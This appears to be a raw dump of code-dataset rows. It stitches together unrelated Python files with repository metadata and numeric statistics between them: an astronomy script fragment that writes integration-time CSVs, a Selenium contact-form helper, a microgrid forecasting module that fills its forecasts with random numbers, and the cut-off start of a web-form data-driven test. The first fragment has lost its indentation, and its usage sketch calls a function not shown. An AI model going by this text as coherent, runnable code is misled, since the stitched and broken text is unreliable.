'WA (mas)': []}
for planet in range(len(PNameFilter)):
dictCI['Disk name'].append(PNameFilter[planet][0])
dictCI['WA (mas)'].append(WA[planet].value * 1000)
for filter in range(len(filterList)):
if (filterList[filter] == 'CONS_NF_Imager' \
or filterList[filter] == 'OPTI_NF_Imager') \
and not np.isnan(np.sum(FR_NF_Imager)):
dictCI['Flux ratio (NF)'] = FR_NF_Imager
dictCI[filterList[filter]+f' (kpp={kppList[filter]:0.2f})'] = \
[''] * len(PNameFilter)
for snr in range(len(SNRList)):
SNR_str=f'{SNRList[snr]:.1f}'.replace(".","p")
dictCI[f'T_{filterList[filter]:s}_SNR{SNR_str:s} ' +
                   '(hours)'] = []
for planet in range(len(PNameFilter)):
SNR_str=f'{SNRList[snr]:.1f}'.replace(".","p")
dictCI[f'T_{filterList[filter]:s}_SNR{SNR_str:s} ' +
                       '(hours)'].append(
np.round(intTimeFilterHours[filter][planet][snr],
decimals=3))
if (filterList[filter] == 'CONS_Amici_Spec' \
or filterList[filter] == 'OPTI_Amici_Spec') \
and not np.isnan(np.sum(FR_Amici_Spec)):
dictCI['Flux ratio (Spec)'] = FR_Amici_Spec
dictCI[filterList[filter]+f' (kpp={kppList[filter]:0.2f})'] = \
[''] * len(PNameFilter)
for snr in range(len(SNRList)):
SNR_str=f'{SNRList[snr]:.1f}'.replace(".","p")
dictCI[f'T_{filterList[filter]:s}_SNR{SNR_str:s} ' +
'(hours)'] = []
for planet in range(len(PNameFilter)):
SNR_str=f'{SNRList[snr]:.1f}'.replace(".","p")
dictCI[f'T_{filterList[filter]:s}_SNR{SNR_str:s} ' +
'(hours)'].append(
np.round(intTimeFilterHours[filter][planet][snr],
decimals=3))
if (filterList[filter] == 'CONS_WF_Imager' \
or filterList[filter] == 'OPTI_WF_Imager') \
and not np.isnan(np.sum(FR_WF_Imager)):
dictCI['Flux ratio (WF)'] = FR_WF_Imager
dictCI[filterList[filter]+f' (kpp={kppList[filter]:0.2f})'] = \
[''] * len(PNameFilter)
for snr in range(len(SNRList)):
SNR_str=f'{SNRList[snr]:.1f}'.replace(".","p")
dictCI[f'T_{filterList[filter]:s}_SNR{SNR_str:s} ' +
'(hours)'] = []
for planet in range(len(PNameFilter)):
SNR_str=f'{SNRList[snr]:.1f}'.replace(".","p")
dictCI[f'T_{filterList[filter]:s}_SNR{SNR_str:s} ' +
'(hours)'].append(
np.round(intTimeFilterHours[filter][planet][snr],
decimals=3))
df = pd.DataFrame.from_dict(dictCI)
df = df.T
if csvFileName.find('.') < 1:
csvFileName += '.csv'
df.to_csv(dir_csv+csvFileName, header=False, encoding='utf-8')
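# A minimal usage sketch for store_csv_file_acc (added for illustration; the target
# name, visibility flags, and epoch below are made up, and running it requires the
# project's INSTALLATION_PATH from config to point at a writable directory).
if __name__ == '__main__':
    demo_names = ['HIP 12345']               # hypothetical target list
    demo_koGood = np.array([1, 0, 1, 1])     # hypothetical accessibility flags
    store_csv_file_acc(demo_names, demo_koGood, len(demo_koGood),
                       61000.0, 'demo_targets')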
| 41.865385
| 81
| 0.520572
| 1,726
| 15,239
| 4.467555
| 0.093279
| 0.124497
| 0.072753
| 0.049021
| 0.901829
| 0.891583
| 0.866684
| 0.819349
| 0.819349
| 0.819349
| 0
| 0.011927
| 0.317737
| 15,239
| 363
| 82
| 41.980716
| 0.72973
| 0.096004
| 0
| 0.843284
| 0
| 0
| 0.201967
| 0.108322
| 0
| 0
| 0
| 0
| 0
| 1
| 0.014925
| false
| 0
| 0.014925
| 0
| 0.029851
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
41c4cbd44db0a608ee50a578fdc7ae6cac7bcf96
| 9,413
|
py
|
Python
|
fixture/contact.py
|
LenaNaum4ik/python_training
|
5d4a5941b703bef5fe7a573e5bc3713aed34749b
|
[
"Apache-2.0"
] | null | null | null |
fixture/contact.py
|
LenaNaum4ik/python_training
|
5d4a5941b703bef5fe7a573e5bc3713aed34749b
|
[
"Apache-2.0"
] | null | null | null |
fixture/contact.py
|
LenaNaum4ik/python_training
|
5d4a5941b703bef5fe7a573e5bc3713aed34749b
|
[
"Apache-2.0"
] | null | null | null |
class ContactHelper:
def __init__(self, app):
self.app = app
def create(self, contact):
wd = self.app.wd
# init contact creation
wd.find_element_by_link_text("add new").click()
# fill contact form
wd.find_element_by_name("firstname").click()
wd.find_element_by_name("firstname").clear()
wd.find_element_by_name("firstname").send_keys(contact.firstname)
wd.find_element_by_name("middlename").click()
wd.find_element_by_name("middlename").clear()
wd.find_element_by_name("middlename").send_keys(contact.middlename)
wd.find_element_by_name("lastname").click()
wd.find_element_by_name("lastname").clear()
wd.find_element_by_name("lastname").send_keys(contact.lastname)
wd.find_element_by_name("nickname").click()
wd.find_element_by_name("nickname").clear()
wd.find_element_by_name("nickname").send_keys(contact.nickname)
wd.find_element_by_name("title").click()
wd.find_element_by_name("title").clear()
wd.find_element_by_name("title").send_keys(contact.title)
wd.find_element_by_name("company").click()
wd.find_element_by_name("company").clear()
wd.find_element_by_name("company").send_keys(contact.company)
wd.find_element_by_name("address").click()
wd.find_element_by_name("address").clear()
wd.find_element_by_name("address").send_keys(contact.address)
wd.find_element_by_name("home").click()
wd.find_element_by_name("home").clear()
wd.find_element_by_name("home").send_keys(contact.home)
wd.find_element_by_name("mobile").click()
wd.find_element_by_name("mobile").clear()
wd.find_element_by_name("mobile").send_keys(contact.mobile)
wd.find_element_by_name("work").click()
wd.find_element_by_name("work").clear()
wd.find_element_by_name("work").send_keys(contact.work)
wd.find_element_by_name("fax").click()
wd.find_element_by_name("fax").clear()
wd.find_element_by_name("fax").send_keys(contact.fax)
wd.find_element_by_name("email").click()
wd.find_element_by_name("email").clear()
wd.find_element_by_name("email").send_keys(contact.email)
wd.find_element_by_name("email2").click()
wd.find_element_by_name("email2").clear()
wd.find_element_by_name("email2").send_keys(contact.email2)
wd.find_element_by_name("email3").click()
wd.find_element_by_name("email3").clear()
wd.find_element_by_name("email3").send_keys(contact.email3)
wd.find_element_by_name("homepage").click()
wd.find_element_by_name("homepage").clear()
wd.find_element_by_name("homepage").send_keys(contact.homepage)
if not wd.find_element_by_xpath("//div[@id='content']/form/select[1]//option[3]").is_selected():
wd.find_element_by_xpath("//div[@id='content']/form/select[1]//option[3]").click()
if not wd.find_element_by_xpath("//div[@id='content']/form/select[2]//option[2]").is_selected():
wd.find_element_by_xpath("//div[@id='content']/form/select[2]//option[2]").click()
wd.find_element_by_name("byear").click()
wd.find_element_by_name("byear").clear()
wd.find_element_by_name("byear").send_keys(contact.byear)
if not wd.find_element_by_xpath("//div[@id='content']/form/select[3]//option[3]").is_selected():
wd.find_element_by_xpath("//div[@id='content']/form/select[3]//option[3]").click()
if not wd.find_element_by_xpath("//div[@id='content']/form/select[4]//option[2]").is_selected():
wd.find_element_by_xpath("//div[@id='content']/form/select[4]//option[2]").click()
wd.find_element_by_name("ayear").click()
wd.find_element_by_name("ayear").clear()
wd.find_element_by_name("ayear").send_keys(contact.ayear)
wd.find_element_by_name("address2").click()
wd.find_element_by_name("address2").clear()
wd.find_element_by_name("address2").send_keys(contact.address2)
wd.find_element_by_name("phone2").click()
wd.find_element_by_name("phone2").clear()
wd.find_element_by_name("phone2").send_keys(contact.phone2)
wd.find_element_by_name("notes").click()
wd.find_element_by_name("notes").clear()
wd.find_element_by_name("notes").send_keys(contact.notes)
# submit group creation
wd.find_element_by_xpath("//div[@id='content']/form/input[21]").click()
    def change_first_contact(self, contact):
wd = self.app.wd
# select first contact
wd.find_element_by_name("selected[]").click()
# init contact change
wd.find_element_by_xpath("//table[@id='maintable']/tbody/tr[2]/td[8]/a/img").click()
# fill contact form
wd.find_element_by_name("firstname").click()
wd.find_element_by_name("firstname").clear()
wd.find_element_by_name("firstname").send_keys(contact.firstname)
wd.find_element_by_name("middlename").click()
wd.find_element_by_name("middlename").clear()
wd.find_element_by_name("middlename").send_keys(contact.middlename)
wd.find_element_by_name("lastname").click()
wd.find_element_by_name("lastname").clear()
wd.find_element_by_name("lastname").send_keys(contact.lastname)
wd.find_element_by_name("nickname").click()
wd.find_element_by_name("nickname").clear()
wd.find_element_by_name("nickname").send_keys(contact.nickname)
wd.find_element_by_name("title").click()
wd.find_element_by_name("title").clear()
wd.find_element_by_name("title").send_keys(contact.title)
wd.find_element_by_name("company").click()
wd.find_element_by_name("company").clear()
wd.find_element_by_name("company").send_keys(contact.company)
wd.find_element_by_name("address").click()
wd.find_element_by_name("address").clear()
wd.find_element_by_name("address").send_keys(contact.address)
wd.find_element_by_name("home").click()
wd.find_element_by_name("home").clear()
wd.find_element_by_name("home").send_keys(contact.home)
wd.find_element_by_name("mobile").click()
wd.find_element_by_name("mobile").clear()
wd.find_element_by_name("mobile").send_keys(contact.mobile)
wd.find_element_by_name("work").click()
wd.find_element_by_name("work").clear()
wd.find_element_by_name("work").send_keys(contact.work)
wd.find_element_by_name("fax").click()
wd.find_element_by_name("fax").clear()
wd.find_element_by_name("fax").send_keys(contact.fax)
wd.find_element_by_name("email").click()
wd.find_element_by_name("email").clear()
wd.find_element_by_name("email").send_keys(contact.email)
wd.find_element_by_name("email2").click()
wd.find_element_by_name("email2").clear()
wd.find_element_by_name("email2").send_keys(contact.email2)
wd.find_element_by_name("email3").click()
wd.find_element_by_name("email3").clear()
wd.find_element_by_name("email3").send_keys(contact.email3)
wd.find_element_by_name("homepage").click()
wd.find_element_by_name("homepage").clear()
wd.find_element_by_name("homepage").send_keys(contact.homepage)
if not wd.find_element_by_xpath("//div[@id='content']/form/select[1]//option[3]").is_selected():
wd.find_element_by_xpath("//div[@id='content']/form/select[1]//option[3]").click()
if not wd.find_element_by_xpath("//div[@id='content']/form/select[2]//option[2]").is_selected():
wd.find_element_by_xpath("//div[@id='content']/form/select[2]//option[2]").click()
wd.find_element_by_name("byear").click()
wd.find_element_by_name("byear").clear()
wd.find_element_by_name("byear").send_keys(contact.byear)
if not wd.find_element_by_xpath("//div[@id='content']/form/select[3]//option[3]").is_selected():
wd.find_element_by_xpath("//div[@id='content']/form/select[3]//option[3]").click()
if not wd.find_element_by_xpath("//div[@id='content']/form/select[4]//option[2]").is_selected():
wd.find_element_by_xpath("//div[@id='content']/form/select[4]//option[2]").click()
wd.find_element_by_name("ayear").click()
wd.find_element_by_name("ayear").clear()
wd.find_element_by_name("ayear").send_keys(contact.ayear)
wd.find_element_by_name("address2").click()
wd.find_element_by_name("address2").clear()
wd.find_element_by_name("address2").send_keys(contact.address2)
wd.find_element_by_name("phone2").click()
wd.find_element_by_name("phone2").clear()
wd.find_element_by_name("phone2").send_keys(contact.phone2)
wd.find_element_by_name("notes").click()
wd.find_element_by_name("notes").clear()
wd.find_element_by_name("notes").send_keys(contact.notes)
# submit contact change
wd.find_element_by_name("update").click()
def delete_first_contact(self):
wd = self.app.wd
        # select first contact
        wd.find_element_by_name("selected[]").click()
        # submit deletion
wd.find_element_by_xpath("//div[@id='content']/form[2]/div[2]/input").click()
wd.switch_to_alert().accept()
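# A minimal usage sketch (added for illustration). ContactHelper expects an app
# fixture exposing a selenium webdriver as app.wd; DemoContact below is a
# hypothetical stand-in for the project's contact model, not part of this file.
from collections import namedtuple

DemoContact = namedtuple('DemoContact', [
    'firstname', 'middlename', 'lastname', 'nickname', 'title', 'company',
    'address', 'home', 'mobile', 'work', 'fax', 'email', 'email2', 'email3',
    'homepage', 'byear', 'ayear', 'address2', 'phone2', 'notes'])

# helper = ContactHelper(app)                # app supplies the webdriver as app.wd
# helper.create(DemoContact(*[''] * 20))     # fill every form field
# helper.delete_first_contact()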
| 53.482955
| 104
| 0.673324
| 1,347
| 9,413
| 4.342984
| 0.058649
| 0.146667
| 0.317778
| 0.366667
| 0.959829
| 0.952991
| 0.937778
| 0.937778
| 0.937778
| 0.92547
| 0
| 0.008888
| 0.163285
| 9,413
| 175
| 105
| 53.788571
| 0.733875
| 0.018804
| 0
| 0.921569
| 0
| 0
| 0.178258
| 0.093306
| 0
| 0
| 0
| 0
| 0
| 1
| 0.026144
| false
| 0
| 0
| 0
| 0.03268
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
68bdf455d2dfa379e3aa734bb14d188f59931f63
| 18,401
|
py
|
Python
|
forecasting/mid_term_forecasting.py
|
Matrixeigs/energy_management_system
|
b2af6a3cfa71173f33d798e943f605d802aed19f
|
[
"MIT"
] | 68
|
2017-11-21T02:49:11.000Z
|
2022-03-25T07:14:42.000Z
|
forecasting/mid_term_forecasting.py
|
yifeili/energy_management_system
|
b2af6a3cfa71173f33d798e943f605d802aed19f
|
[
"MIT"
] | null | null | null |
forecasting/mid_term_forecasting.py
|
yifeili/energy_management_system
|
b2af6a3cfa71173f33d798e943f605d802aed19f
|
[
"MIT"
] | 34
|
2017-11-21T02:52:15.000Z
|
2022-03-27T14:35:25.000Z
|
# Mid-term forecasting for the local energy management system
from data_management.database_format import db_mid_term_forecasting, five_minutes_history_data
from configuration.configuration_time_line import default_look_ahead_time_step, default_time
import random
from configuration.configuration_database import local_history_database
from sqlalchemy import create_engine, and_ # Import database
from sqlalchemy.orm import sessionmaker
db_str = local_history_database["db_str"]
engine = create_engine(db_str, echo=False)
Session = sessionmaker(bind=engine)
session_source = Session()
def blank_forecasting_result(*args):
Target_time = args[0]
default_result = db_mid_term_forecasting \
(TIME_STAMP=Target_time,
AC_PD=0,
AC_QD=0,
UAC_PD=0,
UAC_QD=0,
DC_PD=0,
UDC_PD=0,
PV_PG=0,
WP_PG=0,
PRICE=0, )
return default_result
def middle_term_forecasting_pv(*args):
    # Mid-term forecasting for photovoltaic generation
    session = args[0]
    Target_Time = args[1]
    if session.query(db_mid_term_forecasting).filter(
            db_mid_term_forecasting.TIME_STAMP == Target_Time).count() == 0:
        # The forecasting result does not exist; a dynamic forecast will be triggered!
for i in range(default_look_ahead_time_step["Look_ahead_time_ed_time_step"]):
blank_row = blank_forecasting_result(Target_Time + i * default_time["Time_step_ed"])
session.add(blank_row)
session.commit()
PV_PG = []
for i in range(default_look_ahead_time_step["Look_ahead_time_ed_time_step"]):
PV_PG.append(random.random()) # Replace by other data sources
try:
row = session.query(db_mid_term_forecasting).filter_by(TIME_STAMP = Target_Time + i * default_time["Time_step_ed"]).first()
row.PV_PG = PV_PG[i]
except:
blank_row = blank_forecasting_result(Target_Time + i * default_time["Time_step_ed"])
session.add(blank_row)
session.commit()
row = session.query(db_mid_term_forecasting).filter_by(
TIME_STAMP=Target_Time + i * default_time["Time_step_ed"]).first()
row.PV_PG = PV_PG[i]
session.commit()
return PV_PG
def middle_term_forecasting_wp(*args):
    # Mid-term forecasting for wind power
    session = args[0]
    Target_Time = args[1]
    if session.query(db_mid_term_forecasting).filter(
            db_mid_term_forecasting.TIME_STAMP == Target_Time).count() == 0:
        # The forecasting result does not exist; a dynamic forecast will be triggered!
for i in range(default_look_ahead_time_step["Look_ahead_time_ed_time_step"]):
blank_row = blank_forecasting_result(Target_Time + i * default_time["Time_step_ed"])
session.add(blank_row)
session.commit()
WP_PG = []
for i in range(default_look_ahead_time_step["Look_ahead_time_ed_time_step"]):
WP_PG.append(random.random())
try:
row = session.query(db_mid_term_forecasting).filter_by(
TIME_STAMP=Target_Time + i * default_time["Time_step_ed"]).first()
row.WP_PG = WP_PG[i]
except:
blank_row = blank_forecasting_result(Target_Time + i * default_time["Time_step_ed"])
session.add(blank_row)
session.commit()
row = session.query(db_mid_term_forecasting).filter_by(TIME_STAMP=Target_Time + i * default_time["Time_step_ed"]).first()
row.WP_PG = WP_PG[i]
session.commit()
return WP_PG
def middle_term_forecasting_load_ac(*args):
    # Mid-term forecasting for critical AC load
    session = args[0]
    Target_Time = args[1]
    if session.query(db_mid_term_forecasting).filter(
            db_mid_term_forecasting.TIME_STAMP == Target_Time).count() == 0:
        # The forecasting result does not exist; a dynamic forecast will be triggered!
for i in range(default_look_ahead_time_step["Look_ahead_time_ed_time_step"]):
blank_row = blank_forecasting_result(Target_Time + i * default_time["Time_step_ed"])
session.add(blank_row)
session.commit()
AC_PD = []
for i in range(default_look_ahead_time_step["Look_ahead_time_ed_time_step"]):
AC_PD.append(random.random())
try:
row = session.query(db_mid_term_forecasting).filter_by(TIME_STAMP=Target_Time + i * default_time["Time_step_ed"]).first()
row.AC_PD = AC_PD[i]
except:
blank_row = blank_forecasting_result(Target_Time + i * default_time["Time_step_ed"])
session.add(blank_row)
session.commit()
row = session.query(db_mid_term_forecasting).filter_by(
TIME_STAMP=Target_Time + i * default_time["Time_step_ed"]).first()
row.AC_PD = AC_PD[i]
session.commit()
return AC_PD
def middle_term_forecasting_load_uac(*args):
    # Mid-term forecasting for non-critical AC load
    session = args[0]
    Target_Time = args[1]
    if session.query(db_mid_term_forecasting).filter(
            db_mid_term_forecasting.TIME_STAMP == Target_Time).count() == 0:
        # The forecasting result does not exist; a dynamic forecast will be triggered!
for i in range(default_look_ahead_time_step["Look_ahead_time_ed_time_step"]):
blank_row = blank_forecasting_result(Target_Time + i * default_time["Time_step_ed"])
session.add(blank_row)
session.commit()
UAC_PD = []
for i in range(default_look_ahead_time_step["Look_ahead_time_ed_time_step"]):
UAC_PD.append(random.random())
try:
row = session.query(db_mid_term_forecasting).filter_by(
TIME_STAMP=Target_Time + i * default_time["Time_step_ed"]).first()
row.UAC_PD = UAC_PD[i]
except:
blank_row = blank_forecasting_result(Target_Time + i * default_time["Time_step_ed"])
session.add(blank_row)
session.commit()
row = session.query(db_mid_term_forecasting).filter_by(
TIME_STAMP=Target_Time + i * default_time["Time_step_ed"]).first()
row.UAC_PD = UAC_PD[i]
session.commit()
return UAC_PD
def middle_term_forecasting_load_dc(*args):
    # Mid-term forecasting for critical DC load
    session = args[0]
    Target_Time = args[1]
    if session.query(db_mid_term_forecasting).filter(
            db_mid_term_forecasting.TIME_STAMP == Target_Time).count() == 0:
        # The forecasting result does not exist; a dynamic forecast will be triggered!
for i in range(default_look_ahead_time_step["Look_ahead_time_ed_time_step"]):
blank_row = blank_forecasting_result(Target_Time + i * default_time["Time_step_ed"])
session.add(blank_row)
session.commit()
DC_PD = []
for i in range(default_look_ahead_time_step["Look_ahead_time_ed_time_step"]):
DC_PD.append(random.random())
try:
row = session.query(db_mid_term_forecasting).filter_by(
TIME_STAMP=Target_Time + i * default_time["Time_step_ed"]).first()
row.DC_PD = DC_PD[i]
except:
blank_row = blank_forecasting_result(Target_Time + i * default_time["Time_step_ed"])
session.add(blank_row)
session.commit()
row = session.query(db_mid_term_forecasting).filter_by(
TIME_STAMP=Target_Time + i * default_time["Time_step_ed"]).first()
row.DC_PD = DC_PD[i]
session.commit()
return DC_PD
def middle_term_forecasting_load_udc(*args):
    # Mid-term forecasting for non-critical DC load
    session = args[0]
    Target_Time = args[1]
    if session.query(db_mid_term_forecasting).filter(
            db_mid_term_forecasting.TIME_STAMP == Target_Time).count() == 0:
        # The forecasting result does not exist; a dynamic forecast will be triggered!
for i in range(default_look_ahead_time_step["Look_ahead_time_ed_time_step"]):
blank_row = blank_forecasting_result(Target_Time + i * default_time["Time_step_ed"])
session.add(blank_row)
session.commit()
UDC_PD = []
for i in range(default_look_ahead_time_step["Look_ahead_time_ed_time_step"]):
UDC_PD.append(random.random())
try:
row = session.query(db_mid_term_forecasting).filter_by(
TIME_STAMP=Target_Time + i * default_time["Time_step_ed"]).first()
row.UDC_PD = UDC_PD[i]
except:
blank_row = blank_forecasting_result(Target_Time + i * default_time["Time_step_ed"])
session.add(blank_row)
session.commit()
row = session.query(db_mid_term_forecasting).filter_by(
TIME_STAMP=Target_Time + i * default_time["Time_step_ed"]).first()
row.UDC_PD = UDC_PD[i]
session.commit()
return UDC_PD
def middle_term_forecasting_pv_history(*args):
    # Mid-term forecasting for photovoltaic generation, based on history data
    session = args[0]
    Target_Time = args[1]
    if session.query(db_mid_term_forecasting).filter(
            db_mid_term_forecasting.TIME_STAMP == Target_Time).count() == 0:
        # The forecasting result does not exist; a dynamic forecast will be triggered!
for i in range(default_look_ahead_time_step["Look_ahead_time_ed_time_step"]):
blank_row = blank_forecasting_result(Target_Time + i * default_time["Time_step_ed"])
session.add(blank_row)
session.commit()
PV_PG = []
for i in range(default_look_ahead_time_step["Look_ahead_time_ed_time_step"]):
row_source = session_source.query(five_minutes_history_data).filter_by(
TIME_STAMP=int((Target_Time - default_time["Base_time"]) / default_time["Time_step_ed"]) + i).first()
PV_PG.append(row_source.PV_PG)
try:
row = session.query(db_mid_term_forecasting).filter_by(TIME_STAMP = Target_Time + i * default_time["Time_step_ed"]).first()
row.PV_PG = PV_PG[i]
except:
blank_row = blank_forecasting_result(Target_Time + i * default_time["Time_step_ed"])
session.add(blank_row)
session.commit()
row = session.query(db_mid_term_forecasting).filter_by(
TIME_STAMP=Target_Time + i * default_time["Time_step_ed"]).first()
row.PV_PG = PV_PG[i]
session.commit()
return PV_PG
def middle_term_forecasting_wp_history(*args):
    # Mid-term forecasting for wind power, based on history data
    session = args[0]
    Target_Time = args[1]
    if session.query(db_mid_term_forecasting).filter(
            db_mid_term_forecasting.TIME_STAMP == Target_Time).count() == 0:
        # The forecasting result does not exist; a dynamic forecast will be triggered!
for i in range(default_look_ahead_time_step["Look_ahead_time_ed_time_step"]):
blank_row = blank_forecasting_result(Target_Time + i * default_time["Time_step_ed"])
session.add(blank_row)
session.commit()
WP_PG = []
for i in range(default_look_ahead_time_step["Look_ahead_time_ed_time_step"]):
row_source = session_source.query(five_minutes_history_data).filter_by(
TIME_STAMP=int((Target_Time - default_time["Base_time"]) / default_time["Time_step_ed"]) + i).first()
WP_PG.append(row_source.WP_PG)
try:
row = session.query(db_mid_term_forecasting).filter_by(
TIME_STAMP=Target_Time + i * default_time["Time_step_ed"]).first()
row.WP_PG = WP_PG[i]
except:
blank_row = blank_forecasting_result(Target_Time + i * default_time["Time_step_ed"])
session.add(blank_row)
session.commit()
row = session.query(db_mid_term_forecasting).filter_by(TIME_STAMP=Target_Time + i * default_time["Time_step_ed"]).first()
row.WP_PG = WP_PG[i]
session.commit()
return WP_PG
def middle_term_forecasting_load_ac_history(*args):
    # Mid-term forecasting for critical AC load, based on history data
    session = args[0]
    Target_Time = args[1]
    if session.query(db_mid_term_forecasting).filter(
            db_mid_term_forecasting.TIME_STAMP == Target_Time).count() == 0:
        # The forecasting result does not exist; a dynamic forecast will be triggered!
for i in range(default_look_ahead_time_step["Look_ahead_time_ed_time_step"]):
blank_row = blank_forecasting_result(Target_Time + i * default_time["Time_step_ed"])
session.add(blank_row)
session.commit()
AC_PD = []
for i in range(default_look_ahead_time_step["Look_ahead_time_ed_time_step"]):
row_source = session_source.query(five_minutes_history_data).filter_by(
TIME_STAMP=int((Target_Time - default_time["Base_time"]) / default_time["Time_step_ed"]) + i).first()
AC_PD.append(row_source.AC_PD)
try:
row = session.query(db_mid_term_forecasting).filter_by(TIME_STAMP=Target_Time + i * default_time["Time_step_ed"]).first()
row.AC_PD = AC_PD[i]
except:
blank_row = blank_forecasting_result(Target_Time + i * default_time["Time_step_ed"])
session.add(blank_row)
session.commit()
row = session.query(db_mid_term_forecasting).filter_by(
TIME_STAMP=Target_Time + i * default_time["Time_step_ed"]).first()
row.AC_PD = AC_PD[i]
session.commit()
return AC_PD
def middle_term_forecasting_load_uac_history(*args):
    # Mid-term forecasting for non-critical AC load, based on history data
    session = args[0]
    Target_Time = args[1]
    if session.query(db_mid_term_forecasting).filter(
            db_mid_term_forecasting.TIME_STAMP == Target_Time).count() == 0:
        # The forecasting result does not exist; a dynamic forecast will be triggered!
for i in range(default_look_ahead_time_step["Look_ahead_time_ed_time_step"]):
blank_row = blank_forecasting_result(Target_Time + i * default_time["Time_step_ed"])
session.add(blank_row)
session.commit()
UAC_PD = []
for i in range(default_look_ahead_time_step["Look_ahead_time_ed_time_step"]):
row_source = session_source.query(five_minutes_history_data).filter_by(
TIME_STAMP=int((Target_Time - default_time["Base_time"]) / default_time["Time_step_ed"]) + i).first()
UAC_PD.append(row_source.NAC_PD)
try:
row = session.query(db_mid_term_forecasting).filter_by(
TIME_STAMP=Target_Time + i * default_time["Time_step_ed"]).first()
row.UAC_PD = UAC_PD[i]
except:
blank_row = blank_forecasting_result(Target_Time + i * default_time["Time_step_ed"])
session.add(blank_row)
session.commit()
row = session.query(db_mid_term_forecasting).filter_by(
TIME_STAMP=Target_Time + i * default_time["Time_step_ed"]).first()
row.UAC_PD = UAC_PD[i]
session.commit()
return UAC_PD
def middle_term_forecasting_load_dc_history(*args):
    # Mid-term forecasting for critical DC load, based on history data
    session = args[0]
    Target_Time = args[1]
    if session.query(db_mid_term_forecasting).filter(
            db_mid_term_forecasting.TIME_STAMP == Target_Time).count() == 0:
        # The forecasting result does not exist; a dynamic forecast will be triggered!
for i in range(default_look_ahead_time_step["Look_ahead_time_ed_time_step"]):
blank_row = blank_forecasting_result(Target_Time + i * default_time["Time_step_ed"])
session.add(blank_row)
session.commit()
DC_PD = []
for i in range(default_look_ahead_time_step["Look_ahead_time_ed_time_step"]):
row_source = session_source.query(five_minutes_history_data).filter_by(
TIME_STAMP=int((Target_Time - default_time["Base_time"]) / default_time["Time_step_ed"]) + i).first()
DC_PD.append(row_source.DC_PD)
try:
row = session.query(db_mid_term_forecasting).filter_by(
TIME_STAMP=Target_Time + i * default_time["Time_step_ed"]).first()
row.DC_PD = DC_PD[i]
except:
blank_row = blank_forecasting_result(Target_Time + i * default_time["Time_step_ed"])
session.add(blank_row)
session.commit()
row = session.query(db_mid_term_forecasting).filter_by(
TIME_STAMP=Target_Time + i * default_time["Time_step_ed"]).first()
row.DC_PD = DC_PD[i]
session.commit()
return DC_PD
def middle_term_forecasting_load_udc_history(*args):
    # Mid-term forecasting for non-critical DC load, based on history data
    session = args[0]
    Target_Time = args[1]
    if session.query(db_mid_term_forecasting).filter(
            db_mid_term_forecasting.TIME_STAMP == Target_Time).count() == 0:
        # The forecasting result does not exist; a dynamic forecast will be triggered!
for i in range(default_look_ahead_time_step["Look_ahead_time_ed_time_step"]):
blank_row = blank_forecasting_result(Target_Time + i * default_time["Time_step_ed"])
session.add(blank_row)
session.commit()
UDC_PD = []
for i in range(default_look_ahead_time_step["Look_ahead_time_ed_time_step"]):
row_source = session_source.query(five_minutes_history_data).filter_by(
TIME_STAMP=int((Target_Time - default_time["Base_time"]) / default_time["Time_step_ed"]) + i).first()
UDC_PD.append(row_source.NDC_PD)
try:
row = session.query(db_mid_term_forecasting).filter_by(
TIME_STAMP=Target_Time + i * default_time["Time_step_ed"]).first()
row.UDC_PD = UDC_PD[i]
except:
blank_row = blank_forecasting_result(Target_Time + i * default_time["Time_step_ed"])
session.add(blank_row)
session.commit()
row = session.query(db_mid_term_forecasting).filter_by(
TIME_STAMP=Target_Time + i * default_time["Time_step_ed"]).first()
row.UDC_PD = UDC_PD[i]
session.commit()
return UDC_PD
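# A minimal usage sketch (added for illustration; not part of the original module).
# Running it requires the configured local history database; "Base_time" is taken
# from default_time, as in the *_history functions above.
if __name__ == '__main__':
    demo_session = Session()
    print(middle_term_forecasting_pv(demo_session, default_time["Base_time"]))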
| 40.891111
| 135
| 0.663823
| 2,526
| 18,401
| 4.439034
| 0.038005
| 0.073486
| 0.072238
| 0.091501
| 0.93133
| 0.924552
| 0.923303
| 0.922055
| 0.917328
| 0.917328
| 0
| 0.003293
| 0.240856
| 18,401
| 450
| 136
| 40.891111
| 0.799413
| 0.086137
| 0
| 0.854545
| 0
| 0
| 0.082197
| 0.040026
| 0
| 0
| 0
| 0
| 0
| 1
| 0.039394
| false
| 0
| 0.018182
| 0
| 0.09697
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ec10955284f2ee1c865e36223379f28142d44464
| 2,548
|
py
|
Python
|
seldom-web-testing/test_dir/test_006_file_ddt.py
|
SeldomQA/seldom-platform
|
d165d33b586426669c537c89a0ff7d49d44c5b97
|
[
"Apache-2.0"
] | 2
|
2022-02-12T15:02:04.000Z
|
2022-02-26T12:40:03.000Z
|
seldom-web-testing/test_dir/test_006_file_ddt.py
|
SeldomQA/seldom-platform
|
d165d33b586426669c537c89a0ff7d49d44c5b97
|
[
"Apache-2.0"
] | null | null | null |
seldom-web-testing/test_dir/test_006_file_ddt.py
|
SeldomQA/seldom-platform
|
d165d33b586426669c537c89a0ff7d49d44c5b97
|
[
"Apache-2.0"
] | 2
|
2022-02-22T02:45:49.000Z
|
2022-03-18T12:32:32.000Z
|
import seldom
from seldom import file_data
class FileDataTest(seldom.TestCase):
"""
    File-based data-driven tests
"""
def start(self):
self.test_url = "https://www.w3school.com.cn/tiy/t.asp?f=eg_html_form_submit"
@file_data("json_data.json", key="name")
def test_json_list(self, firstname, lastname):
"""
        data-driven test using file_data
"""
self.open(self.test_url)
self.switch_to_frame(id_="iframeResult")
self.type(name="firstname", text=firstname, clear=True)
self.type(name="lastname", text=lastname, clear=True)
self.sleep(1)
@file_data("json_data.json", key="login")
def test_json_dict(self, username, password):
"""
        data-driven test using file_data
"""
